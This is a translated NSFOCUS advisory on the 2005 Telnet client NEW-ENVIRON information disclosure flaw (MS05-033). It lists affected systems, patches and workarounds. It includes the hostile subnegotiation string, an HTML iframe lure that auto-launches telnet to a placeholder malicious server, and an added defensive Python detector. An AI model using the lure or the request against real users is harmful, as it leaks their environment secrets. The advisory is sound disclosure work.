Multiple Vendor Telnet Client Environment Variable Information Disclosure Vulnerability (MS05-033)

Release date: 2005-06-15
Last updated: 2005-06-15

Affected systems:
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows Services for UNIX 3.5
Microsoft Windows Services for UNIX 3.0
Microsoft Windows Services for UNIX 2.2
RedHat Linux Advanced Workstation 2.1
Sun Solaris 9.0_x86 Update 2
Sun Solaris 9.0_x86
Sun Solaris 9.0
Sun Solaris 8.0_x86
Sun Solaris 8.0
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.8
Sun Solaris 2.7 sparc
Sun Solaris 2.7
Sun Solaris 10.0
Sun SunOS 5.9_x86
Sun SunOS 5.9
Sun SunOS 5.8_x86
Sun SunOS 5.8
Sun SunOS 5.7_x86
Sun SunOS 5.7
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux Desktop 4
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 2.1
RedHat Desktop 3.0
Sun SEAM 1.0.2
Sun SEAM 1.0.1
Sun SEAM 1.0
MIT Kerberos 5 1.3.6
Unaffected systems:
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98
Microsoft Windows 2000SP4
Microsoft Windows 2000SP3
Description:
BUGTRAQ ID: 13940
CVE(CAN) ID: CVE-2005-1205, CVE-2005-0488

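The TELNET protocol allows virtual network terminals to connect over the Internet.

A design error in multiple vendors' Telnet clients may allow a remote attacker to obtain sensitive information from an affected system.

Specifically, the vulnerability is triggered when the Telnet client handles the NEW-ENVIRON subnegotiation option. A malicious server can send the following Telnet subnegotiation option to a connected client: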

SB NEW-ENVIRON SEND ENV_USERVAR <name of environment variable> SE

A vulnerable client then sends back the contents of that environment variable, which may contain sensitive information.
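
The subnegotiation described above can be recognised on the wire using the byte values defined in RFC 854 and RFC 1572. The following Python sketch is an added example, not part of the original advisory or of any vendor patch: it scans server-to-client Telnet bytes and reports NEW-ENVIRON SEND requests for variables outside a local allowlist. The `ALLOWED` set, the function names and the sample stream are assumptions constructed for illustration.

```python
IAC, SB, SE = 255, 250, 240      # Telnet command bytes (RFC 854)
NEW_ENVIRON, SEND = 39, 1        # option code and SEND command (RFC 1572)
VAR, ESC, USERVAR = 0, 2, 3      # type markers inside the subnegotiation
ALLOWED = {"USER", "DISPLAY", "PRINTER", "SYSTEMTYPE"}  # assumed local policy

def subnegotiations(stream):
    """Yield (option, payload) per IAC SB ... IAC SE, undoing IAC IAC escapes."""
    i = 0
    while i + 2 < len(stream):
        if stream[i] != IAC or stream[i + 1] != SB:
            i += 2 if stream[i] == IAC else 1   # skip other commands / escaped 0xFF
            continue
        option, payload, j = stream[i + 2], bytearray(), i + 3
        while j + 1 < len(stream):
            if stream[j] == IAC and stream[j + 1] == SE:
                yield option, bytes(payload)
                break
            if stream[j] == IAC and stream[j + 1] == IAC:
                j += 1                          # doubled IAC is one literal 0xFF
            payload.append(stream[j])
            j += 1
        i = j + 2                               # unterminated blocks yield nothing

def requested_names(payload):
    """Return [(kind, name)] requested by a SEND payload; '' means all of that kind."""
    if not payload or payload[0] != SEND:
        return []
    if len(payload) == 1:
        return [("ALL", "")]                    # bare SEND asks for every variable
    out, k = [], 1
    while k < len(payload):
        kind = {VAR: "VAR", USERVAR: "USERVAR"}.get(payload[k], "UNKNOWN")
        k, name = k + 1, bytearray()
        while k < len(payload) and payload[k] not in (VAR, USERVAR):
            if payload[k] == ESC and k + 1 < len(payload):
                k += 1                          # ESC makes the next byte literal
            name.append(payload[k])
            k += 1
        out.append((kind, name.decode("latin-1")))
    return out

def suspicious_requests(stream):
    """NEW-ENVIRON SEND requests for names outside ALLOWED (wildcards included)."""
    return [(kind, name) for opt, payload in subnegotiations(stream) if opt == NEW_ENVIRON
            for kind, name in requested_names(payload) if name.upper() not in ALLOWED]

# Constructed sample: a DISPLAY request, then a user variable (hypothetical name).
SAMPLE = (bytes([IAC, SB, NEW_ENVIRON, SEND, VAR]) + b"DISPLAY" + bytes([IAC, SE])
          + b"login: " + bytes([IAC, SB, NEW_ENVIRON, SEND, USERVAR]) + b"SECRET_TOKEN" + bytes([IAC, SE]))
```

Calling `suspicious_requests(SAMPLE)` reports only the request for the non-allowlisted user variable; a bare SEND or an empty name is treated as a wildcard and reported as well.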

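To exploit this vulnerability, the attacker must trick the user into connecting to a malicious server. One possible way is a web page that automatically launches the telnet command, for example: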

<html><body>
<iframe src='telnet://malicious.server/'></iframe>
</body></html>

Once this page is opened, the telnet client is launched automatically and attempts to connect to the host "malicious.server".

<*Source: Gaël Delalleau (gael.delalleau+moz@m4x.org)
        iDEFENSE
  
  Links: http://www.idefense.com/application/poi/display?id=260&type=vulnerabilities
        http://www.microsoft.com/technet/security/Bulletin/MS05-033.mspx
        http://www.us-cert.gov/cas/techalerts/TA05-165A.html
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-101671-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-101665-1
        http://lwn.net/Alerts/139795/?format=printable
*>

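Recommendations:
Workarounds:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* On Windows platforms, unregister the default Telnet client.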

Vendor patches:

Microsoft
---------
Microsoft has released a security bulletin (MS05-033) and corresponding patches for this issue:
MS05-033: Vulnerability in Telnet Client Could Allow Information Disclosure (896428)
Link: http://www.microsoft.com/technet/security/Bulletin/MS05-033.mspx

RedHat
------
RedHat has released a security advisory (RHSA-2005-504-00) and corresponding patches for this issue:
RHSA-2005-504-00: Moderate: telnet security update
Link: http://lwn.net/Alerts/139795/?format=printable

Patch downloads:

The patches can be installed with the following command:

rpm -Fvh [filename]

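This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.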